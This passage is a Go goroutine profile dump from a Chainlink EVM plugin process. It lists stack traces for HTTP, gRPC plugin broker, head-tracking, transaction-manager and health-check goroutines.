1 @ 0x44e7b1 0x48ff1d 0x10c3991 0x10c37c5 0x10c0649 0x1295aea 0x129657a 0x889e69 0x88bc67 0x8aa68e 0x887f50 0x4994c1
# 0x10c3990 runtime/pprof.writeRuntimeProfile+0xb0 /usr/local/go/src/runtime/pprof/pprof.go:851
# 0x10c37c4 runtime/pprof.writeGoroutine+0x44 /usr/local/go/src/runtime/pprof/pprof.go:784
# 0x10c0648 runtime/pprof.(*Profile).WriteTo+0x148 /usr/local/go/src/runtime/pprof/pprof.go:408
# 0x1295ae9 net/http/pprof.handler.ServeHTTP+0x529 /usr/local/go/src/net/http/pprof/pprof.go:273
# 0x1296579 net/http/pprof.Index+0xd9 /usr/local/go/src/net/http/pprof/pprof.go:397
# 0x889e68 net/http.HandlerFunc.ServeHTTP+0x28 /usr/local/go/src/net/http/server.go:2286
# 0x88bc66 net/http.(*ServeMux).ServeHTTP+0x1c6 /usr/local/go/src/net/http/server.go:2828
# 0x8aa68d net/http.serverHandler.ServeHTTP+0x8d /usr/local/go/src/net/http/server.go:3311
# 0x887f4f net/http.(*conn).serve+0x64f /usr/local/go/src/net/http/server.go:2073
1 @ 0x49114e 0x41f5ae 0x41f0d2 0x9ef192 0x4994c1
# 0x9ef191 github.com/hashicorp/go-plugin.Serve.func3+0x71 /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/server.go:468
1 @ 0x49114e 0x4521b7 0x490325 0x50e8c7 0x50faee 0x50fadc 0x5d8765 0x5e9445 0x881b33 0x4994c1
# 0x490324 internal/poll.runtime_pollWait+0x84 /usr/local/go/src/runtime/netpoll.go:351
# 0x50e8c6 internal/poll.(*pollDesc).wait+0x26 /usr/local/go/src/internal/poll/fd_poll_runtime.go:84
# 0x50faed internal/poll.(*pollDesc).waitRead+0x2ad /usr/local/go/src/internal/poll/fd_poll_runtime.go:89
# 0x50fadb internal/poll.(*FD).Read+0x29b /usr/local/go/src/internal/poll/fd_unix.go:165
# 0x5d8764 net.(*netFD).Read+0x24 /usr/local/go/src/net/fd_posix.go:68
# 0x5e9444 net.(*conn).Read+0x44 /usr/local/go/src/net/net.go:196
# 0x881b32 net/http.(*connReader).backgroundRead+0x32 /usr/local/go/src/net/http/server.go:702
1 @ 0x49114e 0x4521b7 0x490325 0x50e8c7 0x51394c 0x51393a 0x5da4a9 0x5f33fb 0x5f2350 0x88d80c 0x12adddf 0x4994c1
# 0x490324 internal/poll.runtime_pollWait+0x84 /usr/local/go/src/runtime/netpoll.go:351
# 0x50e8c6 internal/poll.(*pollDesc).wait+0x26 /usr/local/go/src/internal/poll/fd_poll_runtime.go:84
# 0x51394b internal/poll.(*pollDesc).waitRead+0x28b /usr/local/go/src/internal/poll/fd_poll_runtime.go:89
# 0x513939 internal/poll.(*FD).Accept+0x279 /usr/local/go/src/internal/poll/fd_unix.go:613
# 0x5da4a8 net.(*netFD).accept+0x28 /usr/local/go/src/net/fd_unix.go:150
# 0x5f33fa net.(*TCPListener).accept+0x1a /usr/local/go/src/net/tcpsock_posix.go:159
# 0x5f234f net.(*TCPListener).Accept+0x2f /usr/local/go/src/net/tcpsock.go:387
# 0x88d80b net/http.(*Server).Serve+0x30b /usr/local/go/src/net/http/server.go:3434
# 0x12addde github.com/smartcontractkit/chainlink-common/pkg/loop.(*webServer).Start.func1+0x5e /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/web.go:83
1 @ 0x49114e 0x4521b7 0x490325 0x50e8c7 0x51394c 0x51393a 0x5da4a9 0x5f9e16 0x5f89b0 0x9772fc 0x9e9c9d 0x4994c1
# 0x490324 internal/poll.runtime_pollWait+0x84 /usr/local/go/src/runtime/netpoll.go:351
# 0x50e8c6 internal/poll.(*pollDesc).wait+0x26 /usr/local/go/src/internal/poll/fd_poll_runtime.go:84
# 0x51394b internal/poll.(*pollDesc).waitRead+0x28b /usr/local/go/src/internal/poll/fd_poll_runtime.go:89
# 0x513939 internal/poll.(*FD).Accept+0x279 /usr/local/go/src/internal/poll/fd_unix.go:613
# 0x5da4a8 net.(*netFD).accept+0x28 /usr/local/go/src/net/fd_unix.go:150
# 0x5f9e15 net.(*UnixListener).accept+0x15 /usr/local/go/src/net/unixsock_posix.go:172
# 0x5f89af net.(*UnixListener).Accept+0x2f /usr/local/go/src/net/unixsock.go:267
# 0x9772fb google.golang.org/grpc.(*Server).Serve+0x45b /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:921
# 0x9e9c9c github.com/hashicorp/go-plugin.(*GRPCServer).Serve+0x5c /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_server.go:156
1 @ 0x49114e 0x4521b7 0x490325 0x50e8c7 0x51394c 0x51393a 0x5da4a9 0x5f9e16 0x5f89b0 0x9772fc 0xf034c5 0x4a4d0a 0x4994c1
# 0x490324 internal/poll.runtime_pollWait+0x84 /usr/local/go/src/runtime/netpoll.go:351
# 0x50e8c6 internal/poll.(*pollDesc).wait+0x26 /usr/local/go/src/internal/poll/fd_poll_runtime.go:84
# 0x51394b internal/poll.(*pollDesc).waitRead+0x28b /usr/local/go/src/internal/poll/fd_poll_runtime.go:89
# 0x513939 internal/poll.(*FD).Accept+0x279 /usr/local/go/src/internal/poll/fd_unix.go:613
# 0x5da4a8 net.(*netFD).accept+0x28 /usr/local/go/src/net/fd_unix.go:150
# 0x5f9e15 net.(*UnixListener).accept+0x15 /usr/local/go/src/net/unixsock_posix.go:172
# 0x5f89af net.(*UnixListener).Accept+0x2f /usr/local/go/src/net/unixsock.go:267
# 0x9772fb google.golang.org/grpc.(*Server).Serve+0x45b /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:921
# 0xf034c4 github.com/smartcontractkit/chainlink-common/pkg/loop/internal/net.(*BrokerExt).Serve.func1+0xa4 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/internal/net/broker.go:117
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
1 @ 0x49114e 0x46cf05 0x1278ab6 0x4994c1
# 0x1278ab5 github.com/smartcontractkit/chainlink-common/pkg/sqlutil/pg.(*StatsReporter).loop+0x315 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/pg/stats.go:124
1 @ 0x49114e 0x46cf05 0x12af265 0x4994c1
# 0x12af264 github.com/smartcontractkit/chainlink-common/pkg/utils/mailbox.(*Monitor).monitorLoop+0x124 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/utils/mailbox/mailbox_prom.go:66
1 @ 0x49114e 0x46cf05 0x1a02925 0x1a04943 0x4a4d0a 0x4994c1
# 0x1a02924 github.com/smartcontractkit/chainlink-framework/multinode.(*MultiNode[...]).runLoop+0x2e4 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/multi_node.go:343
# 0x1a04942 github.com/smartcontractkit/chainlink-framework/multinode.(*MultiNode[...]).start.(*Engine).Go.func3+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
1 @ 0x49114e 0x46cf05 0x1a0e645 0x4994c1
# 0x1a0e644 github.com/smartcontractkit/chainlink-framework/multinode.(*node[...]).aliveLoop+0xf64 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/node_lifecycle.go:121
1 @ 0x49114e 0x46cf05 0x1a472a6 0x1a47bba 0xb68fa3 0x4a4d0a 0x4994c1
# 0x1a472a5 github.com/smartcontractkit/chainlink-framework/chains/heads.(*listener[...]).receiveHeaders+0x1c5 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/listener.go:157
# 0x1a47bb9 github.com/smartcontractkit/chainlink-framework/chains/heads.(*listener[...]).ListenForNewHeads+0x119 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/listener.go:116
# 0xb68fa2 github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).Go.func1+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
1 @ 0x49114e 0x46cf05 0x1a4a190 0xb68fa3 0x4a4d0a 0x4994c1
# 0x1a4a18f github.com/smartcontractkit/chainlink-framework/chains/heads.(*tracker[...]).backfillLoop+0x8f /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/tracker.go:382
# 0xb68fa2 github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).Go.func1+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
1 @ 0x49114e 0x46cf05 0x1a4a4ec 0xb68fa3 0x4a4d0a 0x4994c1
# 0x1a4a4eb github.com/smartcontractkit/chainlink-framework/chains/heads.(*tracker[...]).broadcastLoop+0x1cb /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/tracker.go:364
# 0xb68fa2 github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).Go.func1+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
1 @ 0x49114e 0x46cf05 0x1a4f4a5 0xb68fa3 0x4a4d0a 0x4994c1
# 0x1a4f4a4 github.com/smartcontractkit/chainlink-framework/chains/heads.(*broadcaster[...]).run+0xa4 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/broadcaster.go:113
# 0xb68fa2 github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).Go.func1+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
1 @ 0x49114e 0x46cf05 0x1b012d0 0x4994c1
# 0x1b012cf github.com/smartcontractkit/chainlink-evm/pkg/txmgr.(*evmFinalizer).runLoop+0xef /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/txmgr/finalizer.go:167
1 @ 0x49114e 0x46cf05 0x1b1b765 0x4994c1
# 0x1b1b764 github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Broadcaster[...]).monitorTxs+0x5c4 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/broadcaster.go:331
1 @ 0x49114e 0x46cf05 0x1b27f58 0x4994c1
# 0x1b27f57 github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Confirmer[...]).runLoop+0xf7 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/confirmer.go:202
1 @ 0x49114e 0x46cf05 0x1b2b9ed 0x4994c1
# 0x1b2b9ec github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Txm[...]).runLoop+0x24c /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/txmgr.go:481
1 @ 0x49114e 0x46cf05 0x902525 0x902237 0x9033e5 0x902f69 0x9722db 0x973297 0x97424b 0x98d699 0x127c8f4 0x991d46 0x9e59ac 0x991c58 0x12acf66 0x97d033 0xd64625 0x97603c 0x97e2f1 0x980005 0x9787bf 0x4994c1
# 0x902524 google.golang.org/grpc/internal/transport.(*recvBufferReader).readMessageHeader+0xa4 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/transport.go:178
# 0x902236 google.golang.org/grpc/internal/transport.(*recvBufferReader).ReadMessageHeader+0x76 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/transport.go:147
# 0x9033e4 google.golang.org/grpc/internal/transport.(*transportReader).ReadMessageHeader+0x24 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/transport.go:458
# 0x902f68 google.golang.org/grpc/internal/transport.(*Stream).ReadMessageHeader+0xa8 /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/transport.go:367
# 0x9722da google.golang.org/grpc.(*parser).recvMsg+0x3a /go/pkg/mod/google.golang.org/grpc@v1.81.0/rpc_util.go:772
# 0x973296 google.golang.org/grpc.recvAndDecompress+0x96 /go/pkg/mod/google.golang.org/grpc@v1.81.0/rpc_util.go:931
# 0x97424a google.golang.org/grpc.recv+0xaa /go/pkg/mod/google.golang.org/grpc@v1.81.0/rpc_util.go:1024
# 0x98d698 google.golang.org/grpc.(*serverStream).RecvMsg+0x198 /go/pkg/mod/google.golang.org/grpc@v1.81.0/stream.go:1824
# 0x127c8f3 github.com/grpc-ecosystem/go-grpc-middleware/v2/interceptors.(*monitoredServerStream).RecvMsg+0x53 /go/pkg/mod/github.com/grpc-ecosystem/go-grpc-middleware/v2@v2.3.3/interceptors/server.go:62
# 0x991d45 github.com/hashicorp/go-plugin/internal/plugin.(*gRPCBrokerStartStreamServer).Recv+0x45 /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/internal/plugin/grpc_broker_grpc.pb.go:120
# 0x9e59ab github.com/hashicorp/go-plugin.(*gRPCBrokerServer).StartStream+0x12b /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:91
# 0x991c57 github.com/hashicorp/go-plugin/internal/plugin._GRPCBroker_StartStream_Handler+0xd7 /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/internal/plugin/grpc_broker_grpc.pb.go:101
# 0x12acf65 github.com/smartcontractkit/chainlink-common/pkg/loop.newServerFn.(*ServerMetrics).StreamServerInterceptor.StreamServerInterceptor.func9+0x2c5 /go/pkg/mod/github.com/grpc-ecosystem/go-grpc-middleware/v2@v2.3.3/interceptors/server.go:35
# 0x97d032 google.golang.org/grpc.getChainStreamHandler.func1+0x152 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1573
# 0xd64624 github.com/smartcontractkit/chainlink-common/pkg/contexts.(*CREServerInterceptor).StreamServerInterceptor+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/contexts/grpc.go:68
# 0x97603b google.golang.org/grpc.NewServer.chainStreamServerInterceptors.chainStreamInterceptors.func2+0x7b /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1564
# 0x97e2f0 google.golang.org/grpc.(*Server).processStreamingRPC+0x1170 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1723
# 0x980004 google.golang.org/grpc.(*Server).handleStream+0xb84 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1860
# 0x9787be google.golang.org/grpc.(*Server).serveStreams.func2.1+0x7e /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1065
1 @ 0x49114e 0x46cf05 0x9e5c15 0x4994c1
# 0x9e5c14 github.com/hashicorp/go-plugin.(*gRPCBrokerServer).StartStream.func1+0xf4 /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:77
1 @ 0x49114e 0x46cf05 0x9e5f65 0x9e7f4c 0x4994c1
# 0x9e5f64 github.com/hashicorp/go-plugin.(*gRPCBrokerServer).Recv+0x64 /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:126
# 0x9e7f4b github.com/hashicorp/go-plugin.(*GRPCBroker).Run+0x4b /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:581
1 @ 0x49114e 0x46cf05 0x9ea14c 0x992df0 0x12acf66 0x97d033 0xd64625 0x97603c 0x97e2f1 0x980005 0x9787bf 0x4994c1
# 0x9ea14b github.com/hashicorp/go-plugin.(*grpcStdioServer).StreamStdio+0x10b /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_stdio.go:61
# 0x992def github.com/hashicorp/go-plugin/internal/plugin._GRPCStdio_StreamStdio_Handler+0x10f /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/internal/plugin/grpc_stdio_grpc.pb.go:117
# 0x12acf65 github.com/smartcontractkit/chainlink-common/pkg/loop.newServerFn.(*ServerMetrics).StreamServerInterceptor.StreamServerInterceptor.func9+0x2c5 /go/pkg/mod/github.com/grpc-ecosystem/go-grpc-middleware/v2@v2.3.3/interceptors/server.go:35
# 0x97d032 google.golang.org/grpc.getChainStreamHandler.func1+0x152 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1573
# 0xd64624 github.com/smartcontractkit/chainlink-common/pkg/contexts.(*CREServerInterceptor).StreamServerInterceptor+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/contexts/grpc.go:68
# 0x97603b google.golang.org/grpc.NewServer.chainStreamServerInterceptors.chainStreamInterceptors.func2+0x7b /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1564
# 0x97e2f0 google.golang.org/grpc.(*Server).processStreamingRPC+0x1170 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1723
# 0x980004 google.golang.org/grpc.(*Server).handleStream+0xb84 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1860
# 0x9787be google.golang.org/grpc.(*Server).serveStreams.func2.1+0x7e /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1065
1 @ 0x49114e 0x46cf05 0x9eebd0 0x1d09a26 0x459735 0x4994c1
# 0x9eebcf github.com/hashicorp/go-plugin.Serve+0x15af /go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/server.go:503
# 0x1d09a25 main.main+0x485 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/cmd/chainlink-evm/main.go:48
# 0x459734 runtime.main+0x2d4 /usr/local/go/src/runtime/proc.go:290
1 @ 0x49114e 0x46cf05 0xb6788f 0x4994c1
# 0xb6788e github.com/smartcontractkit/chainlink-common/pkg/services.(*HealthChecker).run+0xce /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/health.go:175
1 @ 0x49114e 0x46cf05 0xd1bb49 0x4994c1
# 0xd1bb48 database/sql.(*DB).connectionOpener+0x88 /usr/local/go/src/database/sql/sql.go:1261
1 @ 0x49114e 0x46cf05 0xd5fe1b 0x4994c1
# 0xd5fe1a github.com/smartcontractkit/chainlink-common/pkg/utils.(*SleeperTask).workerLoop+0xfa /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/utils/sleeper_task.go:117
1 @ 0x49114e 0x46cf05 0xf033f9 0x4a4d0a 0x4994c1
# 0xf033f8 github.com/smartcontractkit/chainlink-common/pkg/loop/internal/net.(*BrokerExt).Serve.func2+0x58 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/internal/net/broker.go:124
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
goroutine 766 [running]:
runtime/pprof.writeGoroutineStacks({0x283aa00, 0x3b96a70a33b0})
/usr/local/go/src/runtime/pprof/pprof.go:819 +0x6b
runtime/pprof.writeGoroutine({0x283aa00?, 0x3b96a70a33b0?}, 0x3b96a75df7b8?)
/usr/local/go/src/runtime/pprof/pprof.go:782 +0x25
runtime/pprof.(*Profile).WriteTo(0x40914a0?, {0x283aa00?, 0x3b96a70a33b0?}, 0xc?)
/usr/local/go/src/runtime/pprof/pprof.go:408 +0x149
net/http/pprof.handler.ServeHTTP({0x3b96a6ddf151, 0x9}, {0x2859550, 0x3b96a70a33b0}, 0x3b96a77b0a00)
/usr/local/go/src/net/http/pprof/pprof.go:273 +0x52a
net/http/pprof.Index({0x2859550, 0x3b96a70a33b0}, 0x3b96a77b0a00?)
/usr/local/go/src/net/http/pprof/pprof.go:397 +0xda
net/http.HandlerFunc.ServeHTTP(0x41ab900?, {0x2859550?, 0x3b96a70a33b0?}, 0x881a16?)
/usr/local/go/src/net/http/server.go:2286 +0x29
net/http.(*ServeMux).ServeHTTP(0x48d6b9?, {0x2859550, 0x3b96a70a33b0}, 0x3b96a77b0a00)
/usr/local/go/src/net/http/server.go:2828 +0x1c7
net/http.serverHandler.ServeHTTP({0x3b96a7b3cbc0?}, {0x2859550?, 0x3b96a70a33b0?}, 0x1?)
/usr/local/go/src/net/http/server.go:3311 +0x8e
net/http.(*conn).serve(0x3b96a771ebd0, {0x2860048, 0x3b96a7548060})
/usr/local/go/src/net/http/server.go:2073 +0x650
created by net/http.(*Server).Serve in goroutine 212
/usr/local/go/src/net/http/server.go:3464 +0x485
goroutine 1 [select, 1 minutes]:
github.com/hashicorp/go-plugin.Serve(0x3b96a749fe80)
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/server.go:503 +0x15b0
main.main()
/go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/cmd/chainlink-evm/main.go:48 +0x486
goroutine 208 [syscall, 1 minutes]:
os/signal.signal_recv()
/usr/local/go/src/runtime/sigqueue.go:152 +0x98
os/signal.loop()
/usr/local/go/src/os/signal/signal_unix.go:23 +0x13
created by os/signal.Notify.func1.1 in goroutine 1
/usr/local/go/src/os/signal/signal.go:152 +0x1f
goroutine 226 [select, 1 minutes]:
github.com/hashicorp/go-plugin.(*gRPCBrokerServer).Recv(0x3b96a7764370?)
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:126 +0x65
github.com/hashicorp/go-plugin.(*GRPCBroker).Run(0x3b96a7764370)
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:581 +0x4c
created by github.com/hashicorp/go-plugin.(*GRPCServer).Init in goroutine 1
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_server.go:91 +0x57b
goroutine 212 [IO wait]:
internal/poll.runtime_pollWait(0x73191a077000, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0x3b96a776c880?, 0x900000036?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).Accept(0x3b96a776c880)
/usr/local/go/src/internal/poll/fd_unix.go:613 +0x28c
net.(*netFD).accept(0x3b96a776c880)
/usr/local/go/src/net/fd_unix.go:150 +0x29
net.(*TCPListener).accept(0x3b96a6cfa080)
/usr/local/go/src/net/tcpsock_posix.go:159 +0x1b
net.(*TCPListener).Accept(0x3b96a6cfa080)
/usr/local/go/src/net/tcpsock.go:387 +0x30
net/http.(*Server).Serve(0x3b96a6e58500, {0x2857f50, 0x3b96a6cfa080})
/usr/local/go/src/net/http/server.go:3434 +0x30c
github.com/smartcontractkit/chainlink-common/pkg/loop.(*webServer).Start.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/web.go:83 +0x5f
created by github.com/smartcontractkit/chainlink-common/pkg/loop.(*webServer).Start in goroutine 1
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/web.go:81 +0x85
goroutine 213 [select]:
github.com/smartcontractkit/chainlink-common/pkg/services.(*HealthChecker).run(0x3b96a775eff0)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/health.go:175 +0xcf
created by github.com/smartcontractkit/chainlink-common/pkg/loop.(*Server).start.(*HealthChecker).Start.func5 in goroutine 1
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/health.go:154 +0xb6
goroutine 214 [select, 1 minutes]:
database/sql.(*DB).connectionOpener(0x3b96a770add0, {0x2860080, 0x3b96a77599a0})
/usr/local/go/src/database/sql/sql.go:1261 +0x89
created by database/sql.OpenDB in goroutine 1
/usr/local/go/src/database/sql/sql.go:841 +0x130
goroutine 188 [select, 1 minutes]:
google.golang.org/grpc/internal/transport.(*recvBufferReader).readMessageHeader(0x3b96a75d80c8, {0x3b96a7348128, 0x5, 0x5})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/transport.go:178 +0xa5
google.golang.org/grpc/internal/transport.(*recvBufferReader).ReadMessageHeader(0x3b96a75d80c8, {0x3b96a7348128?, 0x3b96a7534000?, 0x3b96a75d8000?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/transport.go:147 +0x77
google.golang.org/grpc/internal/transport.(*transportReader).ReadMessageHeader(0x3b96a75d80a8, {0x3b96a7348128?, 0x3b96a769e6c0?, 0x3b96a7a172d8?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/transport.go:458 +0x25
google.golang.org/grpc/internal/transport.(*Stream).ReadMessageHeader(0x3b96a75d8000, {0x3b96a7348128, 0x5, 0x5})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/transport.go:367 +0xa9
google.golang.org/grpc.(*parser).recvMsg(0x3b96a7348118, 0x1e84800)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/rpc_util.go:772 +0x3b
google.golang.org/grpc.recvAndDecompress(0x3b96a7348118, {0x2839280, 0x3b96a75d8000}, {0x0, 0x0}, 0x1e84800, 0x3b96a7a175c0, {0x0, 0x0}, 0x1)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/rpc_util.go:931 +0x97
google.golang.org/grpc.recv(0x3b96a7a17518?, {0x731918665f98, 0x41e1780}, {0x2839280?, 0x3b96a75d8000?}, {0x0?, 0x0?}, {0x23bbd60, 0x3b96a707c180}, 0x1e84800, ...)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/rpc_util.go:1024 +0xab
google.golang.org/grpc.(*serverStream).RecvMsg(0x3b96a7348100, {0x23bbd60, 0x3b96a707c180})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/stream.go:1824 +0x199
github.com/grpc-ecosystem/go-grpc-middleware/v2/interceptors.(*monitoredServerStream).RecvMsg(0x3b96a7a0afc0, {0x23bbd60, 0x3b96a707c180})
/go/pkg/mod/github.com/grpc-ecosystem/go-grpc-middleware/v2@v2.3.3/interceptors/server.go:62 +0x54
github.com/hashicorp/go-plugin/internal/plugin.(*gRPCBrokerStartStreamServer).Recv(0x3b96a7a0c650)
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/internal/plugin/grpc_broker_grpc.pb.go:120 +0x46
github.com/hashicorp/go-plugin.(*gRPCBrokerServer).StartStream(0x3b96a7985800, {0x2873e28, 0x3b96a7a0c650})
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/grpc_broker.go:91 +0x12c
github.com/hashicorp/go-plugin/internal/plugin._GRPCBroker_StartStream_Handler({0x2237c60?, 0x3b96a7985800}, {0x286dfb0, 0x3b96a7a0afc0})
/go/pkg/mod/github.com/hashicorp/go-plugin@v1.8.0/internal/plugin/grpc_broker_grpc.pb.go:101 +0xd8
github.com/smartcontractkit/chainlink-common/pkg/loop.newServerFn.(*ServerMetrics).StreamServerInterceptor.StreamServerInterceptor.func9({0x2237c60, 0x3b96a7985800}, {0x286e868, 0x3b96a7610280}, 0x20?, 0x281a358)
/go/pkg/mod/github.com/grpc-ecosystem/go-grpc-middleware/v2@v2.3.3/interceptors/server.go:35 +0x2c6
google.golang.org/grpc.getChainStreamHandler.func1({0x2237c60?, 0x3b96a7985800?}, {0x286e868?, 0x3b96a7610280?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1573 +0x153
github.com/smartcontractkit/chainlink-common/pkg/contexts.(*CREServerInterceptor).StreamServerInterceptor(0x3b96a776e3c0, {0x2237c60, 0x3b96a7985800}, {0x286e550, 0x3b96a7348100}, 0x3b96a6c4a870?, 0x3b96a6da4080)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/contexts/grpc.go:68 +0xc5
google.golang.org/grpc.NewServer.chainStreamServerInterceptors.chainStreamInterceptors.func2({0x2237c60, 0x3b96a7985800}, {0x286e550, 0x3b96a7348100}, 0x3b96a6c4a870, 0x3b96a6c6fec0?)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1564 +0x7c
google.golang.org/grpc.(*Server).processStreamingRPC(0x3b96a7700008, {0x2860048, 0x3b96a7694120}, 0x3b96a75d8000, 0x3b96a7985890, 0x40ad680, 0x0)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1723 +0x1171
google.golang.org/grpc.(*Server).handleStream(0x3b96a7700008, {0x28616f8, 0x3b96a7534000}, 0x3b96a75d8000)
